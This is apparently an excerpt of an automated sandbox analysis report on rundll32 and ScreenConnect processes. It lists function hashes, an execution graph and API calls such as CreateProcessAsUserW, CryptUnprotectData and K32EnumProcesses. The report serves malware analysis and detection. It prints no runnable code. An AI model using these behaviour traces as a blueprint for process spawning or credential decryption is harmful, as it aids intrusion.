                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000003.1083157773.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_3_72c0000_rundll32.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 163ba226104be251d1bb94f0a3fd4e14127c62d65206365bc5dcbd7d80581393
                                                                                                                                          • Instruction ID: fd7d79a8e210b91d9243910ea376cd59ff41948c250322a5a6c7c551f3de4387
                                                                                                                                          • Opcode Fuzzy Hash: 163ba226104be251d1bb94f0a3fd4e14127c62d65206365bc5dcbd7d80581393
                                                                                                                                          • Instruction Fuzzy Hash: 46F0E2B1D1938AFFCB02DB74D902048BFB8EA0620971082EFD458DB253EA325E55DB91
                                                                                                                                          Function 072C5288 Relevance: .0, Instructions: 25COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000003.1083157773.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_3_72c0000_rundll32.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9d6dea90a6c50972d5f86c32e45f4aaf0961bd0e10fc9813246706e4133e1c89
                                                                                                                                          • Instruction ID: fb55bce3f09483faabb5193f69118c453b5c61a13f382c47847af4695f847a9e
                                                                                                                                          • Opcode Fuzzy Hash: 9d6dea90a6c50972d5f86c32e45f4aaf0961bd0e10fc9813246706e4133e1c89
                                                                                                                                          • Instruction Fuzzy Hash: AEE026363002040BC304AA1AE840957BB9EDBD9239F100078A40DC7321CD7AAC0286A0
                                                                                                                                          Function 072C2F80 Relevance: .0, Instructions: 24COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000003.1083157773.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_3_72c0000_rundll32.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2034232be25c0534fae45499e77545444ecc98f94a630148c34fc761b01fc056
                                                                                                                                          • Instruction ID: 5b8eeb38d287915dfbf48da1be562233764792249d0d281c3ab5db32f722f651
                                                                                                                                          • Opcode Fuzzy Hash: 2034232be25c0534fae45499e77545444ecc98f94a630148c34fc761b01fc056
                                                                                                                                          • Instruction Fuzzy Hash: D6D02B66639318DBCF0691B030401F5BF5C9B56020F0005DBEE08CF707CC294C4503D5
                                                                                                                                          Function 072C2958 Relevance: .0, Instructions: 21COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000003.1083157773.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_3_72c0000_rundll32.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: db3503d18d1eb11daa5c342e4cdc57f0cb5aef490e6d2f88a74b308ead401c9f
                                                                                                                                          • Instruction ID: 8cbe292933bdb5539e33982962518e189f9656e848629b9f9a0d0bd7222ab910
                                                                                                                                          • Opcode Fuzzy Hash: db3503d18d1eb11daa5c342e4cdc57f0cb5aef490e6d2f88a74b308ead401c9f
                                                                                                                                          • Instruction Fuzzy Hash: FEE0DFB1D09208EFDB00DB74E9024ACBBB9DF41204B4040EEE808D7602EA381E418B92
                                                                                                                                          Function 072C17F0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000003.1083157773.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_3_72c0000_rundll32.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: bfa4aedcfc8e40d50f20b6d65499e5ec9480da8a2754c9bcd70a81a4aa03f76f
                                                                                                                                          • Instruction ID: 79ce5e050d1f211ab4102d48b419e10392dd99f4575b3cea2a63d1ecc698e4b6
                                                                                                                                          • Opcode Fuzzy Hash: bfa4aedcfc8e40d50f20b6d65499e5ec9480da8a2754c9bcd70a81a4aa03f76f
                                                                                                                                          • Instruction Fuzzy Hash: 18D02EBA25C1288FC305AB60B8564887F75AB762A030A80BBE8008B223C8220D53C3C1
                                                                                                                                          Function 072C0C0C Relevance: .0, Instructions: 17COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000003.1083157773.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_3_72c0000_rundll32.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 703252426ed66e285db7dad7801d05c794afd73cd46d15b08b9db93465e8f300
                                                                                                                                          • Instruction ID: 519a044dd017037ab533e1ee33c8b151560ef763618dcff0d06f261157e5afde
                                                                                                                                          • Opcode Fuzzy Hash: 703252426ed66e285db7dad7801d05c794afd73cd46d15b08b9db93465e8f300
                                                                                                                                          • Instruction Fuzzy Hash: DFD023B533901CAF5200B659DC5647ABB59E775391F548637F80593311DD70AC11C7C5
                                                                                                                                          Function 072C2968 Relevance: .0, Instructions: 16COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000003.1083157773.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_3_72c0000_rundll32.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9b30d94546d61b5736b6b0c32b041a5adde4a55cc7bc88b3e91622c2df772f5b
                                                                                                                                          • Instruction ID: b179c4d949c3c51444a9021e81b49fc8920adb8c35d97d2341f0a77f1031cab2
                                                                                                                                          • Opcode Fuzzy Hash: 9b30d94546d61b5736b6b0c32b041a5adde4a55cc7bc88b3e91622c2df772f5b
                                                                                                                                          • Instruction Fuzzy Hash: DED05BB090510CEFDB44DFA9D90156D77B9DB44204F5041A9D40DD7201DA312F409B51
                                                                                                                                          Function 072C7F70 Relevance: .0, Instructions: 16COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000003.1083157773.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_3_72c0000_rundll32.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 078f1c90c04a6c5a335b92dbf8092efddc17920755a8a1581e9dc021745bb737
                                                                                                                                          • Instruction ID: 77fe5cd1d6548a2fd7c8daaf8adc0fad2185729584e167385b20af96baace079
                                                                                                                                          • Opcode Fuzzy Hash: 078f1c90c04a6c5a335b92dbf8092efddc17920755a8a1581e9dc021745bb737
                                                                                                                                          • Instruction Fuzzy Hash: D9D05E70A1120CEFDF40EFB8EA0255DBBB9EB45214F1085A8E80DD3241EE322F009F91
                                                                                                                                          Function 072C0440 Relevance: .0, Instructions: 15COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000003.1083157773.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_3_72c0000_rundll32.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b362f5102ab62d928b40cace51da6cc746bf7bda6fc70ea08c9da97bc2fa611a
                                                                                                                                          • Instruction ID: cb57b70e221a5856610fd008d391a6031482d5e8cc5c0bb47d7f35c804c73d9b
                                                                                                                                          • Opcode Fuzzy Hash: b362f5102ab62d928b40cace51da6cc746bf7bda6fc70ea08c9da97bc2fa611a
                                                                                                                                          • Instruction Fuzzy Hash: 47C08CF3F69A115BE312808C4CD22DB2731DAB3A0D7CCD2C6C0C08800FB1262117C260

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:11.3%
                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                          Signature Coverage:6.2%
                                                                                                                                          Total number of Nodes:113
                                                                                                                                          Total number of Limit Nodes:9
                                                                                                                                          execution_graph 41776 1fe1238 41777 1fe1249 41776->41777 41780 1fe0e24 41777->41780 41782 1fe0e2d 41780->41782 41781 1fe0e9e 41782->41781 41786 1fe36b0 41782->41786 41790 1fe36a0 41782->41790 41783 1fe1282 41787 1fe36c6 41786->41787 41794 1fe4c6c 41787->41794 41788 1fe36cc 41788->41783 41791 1fe36a3 41790->41791 41792 1fe36cc 41790->41792 41791->41792 41793 1fe4c6c RtlGetVersion 41791->41793 41792->41783 41793->41792 41795 1fe4c90 41794->41795 41796 1fe4d1d RtlGetVersion 41795->41796 41798 1fe4cc6 41795->41798 41797 1fe4dda 41796->41797 41797->41788 41798->41788 41660 5ef0040 41661 5ef0044 41660->41661 41669 5ef0bc3 41661->41669 41662 5ef00c7 41664 5ef0207 41662->41664 41675 5ef133f 41662->41675 41679 5ef1350 41662->41679 41663 5ef0a4e 41663->41663 41683 5ef24b0 41664->41683 41670 5ef0bf4 41669->41670 41672 5ef0c3c 41670->41672 41691 5d96199 41670->41691 41699 5d96208 41670->41699 41671 5ef0ccc 41672->41662 41676 5ef135f 41675->41676 41742 5ef13b0 41676->41742 41680 5ef135f 41679->41680 41682 5ef13b0 2 API calls 41680->41682 41681 5ef1374 41681->41664 41682->41681 41684 5ef24de 41683->41684 41686 5ef24f7 41684->41686 41755 5ef2620 41684->41755 41761 5ef2610 41684->41761 41685 5ef2520 41689 5ef2620 2 API calls 41685->41689 41690 5ef2610 2 API calls 41685->41690 41686->41663 41689->41686 41690->41686 41693 5d961ad 41691->41693 41692 5d96235 41692->41671 41694 5d9622c 41693->41694 41707 5d96388 41693->41707 41714 5d96378 41693->41714 41694->41692 41695 5d96388 4 API calls 41694->41695 41696 5d96378 4 API calls 41694->41696 41695->41694 41696->41694 41701 5d9623c 41699->41701 41702 5d9622c 41699->41702 41700 5d96235 41700->41671 41705 5d96388 4 API calls 41701->41705 41706 5d96378 4 API calls 41701->41706 41702->41700 41703 5d96388 4 API calls 41702->41703 41704 5d96378 4 API calls 41702->41704 41703->41702 41704->41702 41705->41702 41706->41702 41709 5d963ad 41707->41709 41710 5d963bd 41707->41710 41708 5d963b6 41708->41694 41709->41708 41735 5d95e64 41709->41735 41721 5d96508 41710->41721 41728 5d964f8 41710->41728 41715 5d96382 41714->41715 41718 5d963ad 41715->41718 41719 5d96508 2 API calls 41715->41719 41720 5d964f8 2 API calls 41715->41720 41716 5d963b6 41716->41694 41717 5d95e64 ProcessIdToSessionId 41717->41718 41718->41716 41718->41717 41719->41718 41720->41718 41725 5d96532 41721->41725 41727 5d9651f 41721->41727 41722 5d96528 41722->41709 41723 5d9669a K32EnumProcesses 41724 5d966d2 41723->41724 41724->41709 41725->41727 41738 5d95e70 41725->41738 41727->41722 41727->41723 41729 5d96508 41728->41729 41730 5d9651f 41729->41730 41734 5d95e70 K32EnumProcesses 41729->41734 41731 5d96528 41730->41731 41732 5d9669a K32EnumProcesses 41730->41732 41731->41709 41733 5d966d2 41732->41733 41733->41709 41734->41729 41736 5d96740 ProcessIdToSessionId 41735->41736 41737 5d967b3 41736->41737 41737->41709 41739 5d96648 K32EnumProcesses 41738->41739 41741 5d966d2 41739->41741 41741->41725 41743 5ef13eb 41742->41743 41747 5ef2278 41743->41747 41751 5ef2280 41743->41751 41744 5ef14b9 41748 5ef2280 CreateProcessAsUserW 41747->41748 41750 5ef2364 41748->41750 41750->41744 41752 5ef22d3 CreateProcessAsUserW 41751->41752 41754 5ef2364 41752->41754 41754->41744 41756 5ef262d 41755->41756 41758 5ef2664 41756->41758 41767 5ef174c 41756->41767 41760 5ef266f 41758->41760 41771 5effb54 41758->41771 41760->41685 41762 5ef262d 41761->41762 41763 5ef174c WaitNamedPipeW 41762->41763 41764 5ef2664 41762->41764 41763->41762 41765 5ef266f 41764->41765 41766 5effb54 CreateFileA 41764->41766 41765->41685 41766->41765 41768 5ef2688 WaitNamedPipeW 41767->41768 41770 5ef2704 41768->41770 41770->41756 41772 5effb32 41771->41772 41773 5effb5f CreateFileA 41771->41773 41772->41760 41775 5effc95 41773->41775 41799 48716f8 41800 4871740 CryptProtectData 41799->41800 41801 487173a 41799->41801 41802 4871783 41800->41802 41801->41800

                                                                                                                                          Executed Functions

                                                                                                                                          Function 05EF2280 Relevance: 1.6, APIs: 1, Instructions: 93processCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 267 5ef2280-5ef22d1 268 5ef22dc-5ef22e0 267->268 269 5ef22d3-5ef22d9 267->269 270 5ef22e8-5ef22fd 268->270 271 5ef22e2-5ef22e5 268->271 269->268 272 5ef22ff-5ef2308 270->272 273 5ef230b-5ef2362 CreateProcessAsUserW 270->273 271->270 272->273 274 5ef236b-5ef2393 273->274 275 5ef2364-5ef236a 273->275 275->274
                                                                                                                                          APIs
                                                                                                                                          • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05EF234F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2354644131.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_5ef0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateProcessUser
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2217836671-0
                                                                                                                                          • Opcode ID: 36b3f446f86c2daf6fac3eacbc16b0429499c957a3133772409ecf148dd7990b
                                                                                                                                          • Instruction ID: 83f53d1a34d9a3f7f7ba0a2a347aaec175b1bd1db128e8201a2ddd6a25395ba2
                                                                                                                                          • Opcode Fuzzy Hash: 36b3f446f86c2daf6fac3eacbc16b0429499c957a3133772409ecf148dd7990b
                                                                                                                                          • Instruction Fuzzy Hash: 3241477690020ADFDF10CFA9C884ADEBBF6FF48310F14852AEA58A7250D735A955CF90
                                                                                                                                          Function 048716F1 Relevance: 1.6, APIs: 1, Instructions: 63encryptionCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 353 48716f1-4871738 354 4871740-4871781 CryptProtectData 353->354 355 487173a-487173d 353->355 356 4871783-4871789 354->356 357 487178a-48717b2 354->357 355->354 356->357
                                                                                                                                          APIs
                                                                                                                                          • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 0487176E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2345977695.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_4870000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CryptDataProtect
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3091777813-0
                                                                                                                                          • Opcode ID: 76701f797e5c6b362d053f63a004f096b5e99e9986781711254ba367e3f5bddd
                                                                                                                                          • Instruction ID: c7fa2429a56aeb2e1e262fa90c855d31f71b325e28a383f7ae3aa32c138ae192
                                                                                                                                          • Opcode Fuzzy Hash: 76701f797e5c6b362d053f63a004f096b5e99e9986781711254ba367e3f5bddd
                                                                                                                                          • Instruction Fuzzy Hash: 662116768002499FCB21CF99C844ADEBBB1FF48350F14851AE969A7211C739A555CFA1
                                                                                                                                          Function 048716F8 Relevance: 1.6, APIs: 1, Instructions: 61encryptionCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 360 48716f8-4871738 361 4871740-4871781 CryptProtectData 360->361 362 487173a-487173d 360->362 363 4871783-4871789 361->363 364 487178a-48717b2 361->364 362->361 363->364
                                                                                                                                          APIs
                                                                                                                                          • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 0487176E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2345977695.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_4870000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CryptDataProtect
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3091777813-0
                                                                                                                                          • Opcode ID: 11856000f7730cbeaab5d72fac2d8a6368abaef5a3bed8fcbbaabb2bcbef2bb5
                                                                                                                                          • Instruction ID: 0ba7b4e1fc3b5fbf27e6b20455671794b5107aca34945dbcdaa7f29c2e21887d
                                                                                                                                          • Opcode Fuzzy Hash: 11856000f7730cbeaab5d72fac2d8a6368abaef5a3bed8fcbbaabb2bcbef2bb5
                                                                                                                                          • Instruction Fuzzy Hash: 6A2107B68002499FDF11CF9AC844ADEBBB5FF48350F14851AE914A7210C379A555DFA1
                                                                                                                                          Function 05D92D68 Relevance: 1.6, APIs: 1, Instructions: 57encryptionCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 375 5d92d68-5d92de8 CryptUnprotectData 377 5d92dea-5d92df0 375->377 378 5d92df1-5d92e19 375->378 377->378
                                                                                                                                          APIs
                                                                                                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05D92DD5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2354017646.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_5d90000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 834300711-0
                                                                                                                                          • Opcode ID: b174d12925208f6de53b225aa2258390b39eb40f7c07c3f2b2f8c1361146023a
                                                                                                                                          • Instruction ID: 8b3380f87d463450f7dcfa94b56ca025782aea28b9031aee90c23bda623707ca
                                                                                                                                          • Opcode Fuzzy Hash: b174d12925208f6de53b225aa2258390b39eb40f7c07c3f2b2f8c1361146023a
                                                                                                                                          • Instruction Fuzzy Hash: 6F2106B680024AAFDF10CF99C845BDEBBF5EF48320F14841AEA14A7350D339A555DFA5
                                                                                                                                          Function 05D92D70 Relevance: 1.6, APIs: 1, Instructions: 54encryptionCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05D92DD5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2354017646.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_5d90000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 834300711-0
                                                                                                                                          • Opcode ID: 62a150c68de6b653f7c3cf978334da94aa558130a7ee2e4ab9ddc83db737fe57
                                                                                                                                          • Instruction ID: 753e2da8d221add4ba78672120160e2886412dd6368aef286dbb2185e2fa0bb1
                                                                                                                                          • Opcode Fuzzy Hash: 62a150c68de6b653f7c3cf978334da94aa558130a7ee2e4ab9ddc83db737fe57
                                                                                                                                          • Instruction Fuzzy Hash: E92114B680024ADFDF20CF99C845BDEBBF4EF48320F14841AEA14A7250D339A555DFA5
                                                                                                                                          Function 05D96508 Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 149 5d96508-5d9651d 150 5d9651f-5d96522 149->150 151 5d96532-5d96539 149->151 152 5d96528-5d96531 150->152 153 5d965ec-5d96600 150->153 154 5d9653e-5d96582 call 5d95e70 151->154 155 5d96602 153->155 156 5d965c6-5d965cf 153->156 175 5d96587-5d9658c 154->175 160 5d9660e-5d96617 155->160 157 5d9662c-5d96640 156->157 158 5d965d1-5d965eb 156->158 163 5d96699 157->163 164 5d96642-5d9668e 157->164 165 5d9669a-5d966d0 K32EnumProcesses 163->165 164->165 168 5d96690-5d96698 164->168 169 5d966d9-5d96701 165->169 170 5d966d2-5d966d8 165->170 168->165 170->169 176 5d96618-5d96625 175->176 177 5d96592-5d96595 175->177 176->157 178 5d96604-5d96609 177->178 179 5d96597-5d965c4 177->179 178->154 179->156 179->160
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2354017646.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_5d90000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: baff3a7c29b697960b9bc3e2677f54180bbc3482516b6087c4af7a4a07366c35
                                                                                                                                          • Instruction ID: d0c6c9eb61e4676cafa67856339be480e6ea5d85cf73fd1fc4bbaf40e4415c78
                                                                                                                                          • Opcode Fuzzy Hash: baff3a7c29b697960b9bc3e2677f54180bbc3482516b6087c4af7a4a07366c35
                                                                                                                                          • Instruction Fuzzy Hash: E4519C71A007058FCB24CFAAD880AAEBBF5FF88310F14896ED55AD3651D734E945CBA1
                                                                                                                                          Function 05EFFB54 Relevance: 1.6, APIs: 1, Instructions: 128fileCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 184 5effb54-5effb5d 185 5effb5f-5effbbc 184->185 186 5effb32-5effb43 call 5efe9e8 184->186 188 5effbbe-5effbe3 185->188 189 5effc10-5effc93 CreateFileA 185->189 192 5effb48-5effb4a 186->192 188->189 194 5effbe5-5effbe7 188->194 200 5effc9c-5effcda 189->200 201 5effc95-5effc9b 189->201 195 5effc0a-5effc0d 194->195 196 5effbe9-5effbf3 194->196 195->189 198 5effbf7-5effc06 196->198 199 5effbf5 196->199 198->198 202 5effc08 198->202 199->198 206 5effcdc-5effce0 200->206 207 5effcea 200->207 201->200 202->195 206->207 208 5effce2 206->208 209 5effceb 207->209 208->207 209->209
                                                                                                                                          APIs
                                                                                                                                          • CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 05EFFC7D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2354644131.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_5ef0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateFile
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                          • Opcode ID: c90932ee98cdb8bcf3bdca8416d70a959f917516722ff53be8eee6325c59f890
                                                                                                                                          • Instruction ID: 240d86c4e3a07c22c4cca06a6fb7a35d64a7fa0849197fe9f3dbec6ff7b088c5
                                                                                                                                          • Opcode Fuzzy Hash: c90932ee98cdb8bcf3bdca8416d70a959f917516722ff53be8eee6325c59f890
                                                                                                                                          • Instruction Fuzzy Hash: FF518BB1E003599FDB10CFA8C845B9DBBF1FB08308F248029E958AB391DBB59841CF95
                                                                                                                                          Function 05EFFB60 Relevance: 1.6, APIs: 1, Instructions: 116fileCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 210 5effb60-5effbbc 211 5effbbe-5effbe3 210->211 212 5effc10-5effc93 CreateFileA 210->212 211->212 215 5effbe5-5effbe7 211->215 221 5effc9c-5effcda 212->221 222 5effc95-5effc9b 212->222 216 5effc0a-5effc0d 215->216 217 5effbe9-5effbf3 215->217 216->212 219 5effbf7-5effc06 217->219 220 5effbf5 217->220 219->219 223 5effc08 219->223 220->219 227 5effcdc-5effce0 221->227 228 5effcea 221->228 222->221 223->216 227->228 229 5effce2 227->229 230 5effceb 228->230 229->228 230->230
                                                                                                                                          APIs
                                                                                                                                          • CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 05EFFC7D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2354644131.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_5ef0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateFile
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                          • Opcode ID: cb3723d4d6708c3a29db3f5ad8509c6cc8a63dc2725c69e4b3de04c6cd7b3e4c
                                                                                                                                          • Instruction ID: 1e84903700a762ece2093e6b53183eb3ca9e9e94466dde560d985d11d4f1e899
                                                                                                                                          • Opcode Fuzzy Hash: cb3723d4d6708c3a29db3f5ad8509c6cc8a63dc2725c69e4b3de04c6cd7b3e4c
                                                                                                                                          • Instruction Fuzzy Hash: 134169B1D002599FDB10CFA9C844B8EBBF1FB48308F248129E958AB351DB759841CF91
                                                                                                                                          Function 01FE4C6C Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 231 1fe4c6c-1fe4cb3 236 1fe4cb5-1fe4cc4 call 1fe4848 231->236 237 1fe4d02-1fe4d08 231->237 240 1fe4d09-1fe4dd8 RtlGetVersion 236->240 241 1fe4cc6-1fe4ccb 236->241 246 1fe4dda-1fe4de0 240->246 247 1fe4de1-1fe4e24 240->247 253 1fe4cce call 1fe52f8 241->253 254 1fe4cce call 1fe52e8 241->254 242 1fe4cd4 242->237 246->247 251 1fe4e2b-1fe4e32 247->251 252 1fe4e26 247->252 252->251 253->242 254->242
                                                                                                                                          APIs
                                                                                                                                          • RtlGetVersion.NTDLL(0000009C), ref: 01FE4DBE
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2321434360.0000000001FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01FE0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_1fe0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Version
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                          • Opcode ID: 8f1ba4825d7868cbafc5036bf825d0196b188ac52acb98a9912d1780baa70207
                                                                                                                                          • Instruction ID: 2ed2aa4d0582fe6b87ef4a2d790fcb9ea29cad0e4d0fd7c4321263d1c0455328
                                                                                                                                          • Opcode Fuzzy Hash: 8f1ba4825d7868cbafc5036bf825d0196b188ac52acb98a9912d1780baa70207
                                                                                                                                          • Instruction Fuzzy Hash: 5F417F71E00359DFEB60DF68C818BADBBB5FB44300F0085AAD609E7290DB759985CF92
                                                                                                                                          Function 05EF2278 Relevance: 1.6, APIs: 1, Instructions: 96processCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
